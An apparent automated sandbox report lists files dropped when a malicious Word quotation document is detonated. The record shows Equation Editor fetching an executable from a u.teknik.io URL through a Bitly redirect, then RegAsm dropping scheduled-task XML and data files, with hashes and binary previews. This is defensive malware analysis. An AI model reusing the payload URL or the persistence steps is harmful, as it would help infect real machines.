                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):53248
                                                                                Entropy (8bit):4.48905382202799
                                                                                Encrypted:false
                                                                                SSDEEP:768:GP2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2hhFRJS8AW:tJv46yoD2BTNz1+M9GLfvw8AW
                                                                                MD5:246BB0F8D68A463FD17C235DEB5491C0
                                                                                SHA1:63F237F94EAB14CB4DCA7ACB5817644D4428873A
                                                                                SHA-256:32B60D7BBA22CC1682F4BA651D86C9FB357BDC82E9A284AB9668E5446BD24BB3
                                                                                SHA-512:187D08DF6563739A3A537439F313D9F4D53001FA8A9CD146986DAB3C1168E25E210771AFC2A7D6C2A88EB44F0EEF2E91DDCEA8ABD86742AD0E6D78F07BDF7996
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: Virustotal, Detection: 0%
                                                                                • Antivirus: Metadefender, Detection: 0%
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: PO AAN2102002-V020.doc, Detection: malicious
                                                                                • Filename: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc, Detection: malicious
                                                                                • Filename: RFQ # TSI2202708.doc, Detection: malicious
                                                                                • Filename: rfq_20712557-20200308 Order.doc, Detection: malicious
                                                                                • Filename: 31RFQ 49177 PO-DM-11-2018-109159.exe, Detection: malicious
                                                                                • Filename: 69shipment Details...exe, Detection: malicious
                                                                                • Filename: 64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious
                                                                                • Filename: 22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious
                                                                                • Filename: 41COSCO TBN FULLY SIGNED CPFN.exe, Detection: malicious
                                                                                • Filename: 19Request for Quote_Goedeker_6397_3 01-2_12137018.exe, Detection: malicious
                                                                                • Filename: 72Payment....exe, Detection: malicious
                                                                                • Filename: 832238740303837363.exe, Detection: malicious
                                                                                • Filename: 35Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious
                                                                                • Filename: 61Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious
                                                                                • Filename: 17Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious
                                                                                • Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe, Detection: malicious
                                                                                • Filename: 71RFQ Ganix Global-180001899918 & 500037221.exe, Detection: malicious
                                                                                • Filename: 81PAYMENT.exe, Detection: malicious
                                                                                • Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe, Detection: malicious
                                                                                • Filename: 2810010518.exe, Detection: malicious
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: MZ/PE header ("This program cannot be run in DOS mode"), PE32 image with sections .text, .rsrc and .reloc; remainder of the preview is binary padding.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: MSCF cabinet header containing the single compressed entry authroot.stl; remainder of the preview is compressed binary data.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):893
                                                                                Entropy (8bit):7.366016576663508
                                                                                Encrypted:false
                                                                                SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: DER-encoded certificate data for "Digital Signature Trust Co." / "DST Root CA X3" (validity 000930211219Z to 210930140115Z); remainder of the preview is binary certificate content.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.080958610796429
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKLKEbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:jM3kPlE99SNxAhUeo+aKt
                                                                                MD5:AD9008ACF5082FA8EB71D2E8C5BD9B96
                                                                                SHA1:11394AD7642601A83B356A265AC805C5E28A27AC
                                                                                SHA-256:4EE9FB4CE3E871D63A19C36B13F3AD281EB17EEAE99A9C13EC45CCC220B6DBCB
                                                                                SHA-512:B44C0F7E414E3405AA0DF081E723086E5FB08A622DF2BCDCEEBCC19C77C97D3946A7FB7D7EC34DF1DED51A28EDDA3432B2D206053A89BF5E5431E29974642B12
                                                                                Malicious:false
                                                                                Preview: p...... ........b.......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):252
                                                                                Entropy (8bit):3.0294634724686764
                                                                                Encrypted:false
                                                                                SSDEEP:3:kkFklA9M1fllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK5QliBAIdQZV7eAYLit
                                                                                MD5:030E777529B43E0D9FED41EFFE564B26
                                                                                SHA1:80E57C39FC84DC03AFC464FF6E0E9D66239F1BD3
                                                                                SHA-256:88ABA1A4879A359E121690E3BBC990017F6C45ABBA1EB0FDAF3DFAAD07A5BE61
                                                                                SHA-512:75E8FEA934E26617B9E933794507CF9FA2ADD1AFF10000D35652F468742F4B4AE2B33A1447138A70BA9F9045F84C31E63E38D59CDAC4BB2B9C0C80FFEC12BB2C
                                                                                Malicious:false
                                                                                Preview: p...... ....`....SJ.....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):4.856871861209239
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
                                                                                MD5:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                SHA1:8024E4315C4BD196F1531E08C541359DBAC70A39
                                                                                SHA-256:CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
                                                                                SHA-512:A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Virustotal, Detection: 42%
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                IE Cache URL:https://u.teknik.io/wREzo.txt
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2ZKf4aq[1].htm
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:HTML document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):116
                                                                                Entropy (8bit):4.572661742712173
                                                                                Encrypted:false
                                                                                SSDEEP:3:qVvzLURODccZ/vXbvx9nDyZHL+E8IkFSXbKFvNGb:qFzLIeco3XLx92ZHqHIMSLWQb
                                                                                MD5:64D298FA5892D258CB4465CD14478454
                                                                                SHA1:0BBAEB8DBA81A7861C1AAFBAB629538937594658
                                                                                SHA-256:89007ADC49FABF9602747C7FA654CC9174D9FE25FD1CBF9DBA800329AAEBF36B
                                                                                SHA-512:C717A6A0C3811DC77B485D9D70159EE277970D213F456BC6F79FA0910E249BEC845E61CA24B6F48A73EEE15130743C27781A35610C945018BBC9B81BC9A1AC4A
                                                                                Malicious:false
                                                                                Preview: <html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/wREzo.txt">moved here</a></body>.</html>
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8F28-8909E0160183}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1834894
                                                                                Entropy (8bit):4.020416000417094
                                                                                Encrypted:false
                                                                                SSDEEP:12288:DoINuEINuEINuEINuVINuEwNuEINueINuEINuEINuEINtEINuEINuEINuEINuEIX:k
                                                                                MD5:BCAEE394FB7661B22A808356CABD3615
                                                                                SHA1:E9252AC0D9998D3E8EAB95CF0153A29852A756A4
                                                                                SHA-256:1D0BF7198BD288E1276088B92D41C342A575DA7C2AB9085BF47A3A5C6843D175
                                                                                SHA-512:84EF925747D34DFEDFCE70B97A2FE525FBF5FD844B3368395FE9773E282AB561ACAA755D519ACE34A3CDDD402FD29B6696CCD161C6869573FB7BCF5A1AE1ACE6
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F90-30CA-4646-ACFF-79FC9E14ADCB}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1024
                                                                                Entropy (8bit):0.05390218305374581
                                                                                Encrypted:false
                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2D3EB9C-AB70-4784-8852-5C03B64EE05D}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1536
                                                                                Entropy (8bit):1.3568273340340575
                                                                                Encrypted:false
                                                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbQ:IiiiiiiiiifdLloZQc8++lsJe1Mzb
                                                                                MD5:C990C02C26800951CBF8B0581C7AAC39
                                                                                SHA1:9768AA8776819BD7E836740634B596D46FFA8303
                                                                                SHA-256:0DDDB3264217F403F4D0D5791562DDA835E42E9592B1BCE42E6F1076F31F7AC3
                                                                                SHA-512:CC236BE11D2BAB46160A6AE3C01168B6B92A2DD5A77E027D561E00B5A5A617045008E975C6E54D73D3E6BFF5B7B499AFD560FDEFCA7B1FBCCBFB95436BE022B2
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\CabBF0C.tmp
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\Local\Temp\TarBF0D.tmp
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):152788
                                                                                Entropy (8bit):6.316654432555028
                                                                                Encrypted:false
                                                                                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                Malicious:false
                                                                                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                C:\Users\user\AppData\Local\Temp\tmp80F5.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1310
                                                                                Entropy (8bit):5.1063907901076036
                                                                                Encrypted:false
                                                                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
                                                                                MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
                                                                                SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
                                                                                SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
                                                                                SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
                                                                                Malicious:false
                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                C:\Users\user\AppData\Local\Temp\tmp9445.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1319
                                                                                Entropy (8bit):5.133606110275315
                                                                                Encrypted:false
                                                                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
                                                                                MD5:C6F0625BF4C1CDFB699980C9243D3B22
                                                                                SHA1:43DE1FE580576935516327F17B5DA0C656C72851
                                                                                SHA-256:8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
                                                                                SHA-512:9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
                                                                                Malicious:true
                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):928
                                                                                Entropy (8bit):7.024371743172393
                                                                                Encrypted:false
                                                                                SSDEEP:24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtw:Ik/lCrwfk/lCrwfk/lCrwfk/lCrw8
                                                                                MD5:CCB690520E68EE385ACC0ACFE759AFFC
                                                                                SHA1:33F0DA3F55E5B3C5AC19B61D31471CB60BCD5C96
                                                                                SHA-256:166154225DAB5FCB79C1CA97D371B159D37B83FBC0ADABCD8EBA98FA113A7A3B
                                                                                SHA-512:AC4F3CF1F8F460745D37E6350861C2FBCDDCC1BBDE0A48FB361BFBF5B1EBF10A05F798A72CE413FCA073FF8108955353DDBCBD9D50CED6CDAE231C67A28FDDA3
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8
                                                                                Entropy (8bit):3.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:xt:r
                                                                                MD5:3ABB7239389DBB84935EC98902664658
                                                                                SHA1:85EF47D1F243C052DA1C993B9A5F0D953AEB04EE
                                                                                SHA-256:C56B2DE67DFEBED5A8C2EAEC31498AD5E2AC6586A6C15EA6E82AB708FE8EBFC7
                                                                                SHA-512:BA77692928043D117C69ABCB3ADEE4F90E23AF8F30FEA996E3746F4971EEB030DBED26F535EEA1AF377E7DCB83911E977C0490C9C6923EC27BB025AD4B988FB6
                                                                                Malicious:true
                                                                                Preview: ..x....H
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Feb 25 14:28:30 2021, length=967360, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2568
                                                                                Entropy (8bit):4.577226214280601
                                                                                Encrypted:false
                                                                                SSDEEP:48:8QQY/XT3IkMbi1c42IQh2QQY/XT3IkMbi1c42IQ/:8QQY/XLIkMzpIQh2QQY/XLIkMzpIQ/
                                                                                MD5:2FF98281FD0929741EEB9C54BF54DB9B
                                                                                SHA1:C7F911DBA118EE784BB739A68E8F3798C8CB8A71
                                                                                SHA-256:7A1350716802EDF98667519C211D93E8B01CBA0016E0988EB36016D93F20F795
                                                                                SHA-512:5494D271B997819243119463B6DB88DC2F1D6E7EB9CD4F990B200116643DF201C6C39ADD17CA552C7A080F3617DE03CD28AED54293CDDC929C7929E3A6BE4E7E
                                                                                Malicious:false
                                                                                Preview: L..................F.... ...u....{..u....{..ym.............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....YR.{ .QUOTAT~1.DOC..........Q.y.Q.y*...8.....................Q.U.O.T.A.T.I.O.N.s.4.4.8.8.8._.A.2.2.2.1._.T.O.A.N._.T.A.N._.L.O.C._.T.R.A.D.I.N.G._.S.E.R.V.I.C.E.S._.J.O.I.N.T._.S.T.O.C.K.s...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.U.O.T.A.T.I.O.N.s.4.4.8.8.8._.A.2.2.2.1._.T.O.A.N._.T.A.N._.L.O.C._.T.R.A.D.I.N.G._.S.E.R.V.I.C.E.S._.J.O.I.N.T._.S.T.O.C.K.s..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):230
                                                                                Entropy (8bit):4.619567959906291
                                                                                Encrypted:false
                                                                                SSDEEP:6:M7qjk8A2zDKnKqjk8A2zDKjqjk8A2zDKs:Md87anY87aV87as
                                                                                MD5:8164887DD336F403637A7B7C1135A1DA
                                                                                SHA1:0D2E021E54D11E130E87026854D6D8367BC65052
                                                                                SHA-256:8617F63E83B01A5499DAB372DFB16503950187DFD4C82A4485F137476564F204
                                                                                SHA-512:9E8A0BCB48782714F3DE01F8482DB2B913DB7213334353C4A2B43B0B12AD5D56BEF8756A42746CA1537CFD56DEEE7A5ACCC1D56E22B8CE44A7DF0EE02D8F9AF6
                                                                                Malicious:false
                                                                                Preview: [doc]..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..[doc]..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.431160061181642
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
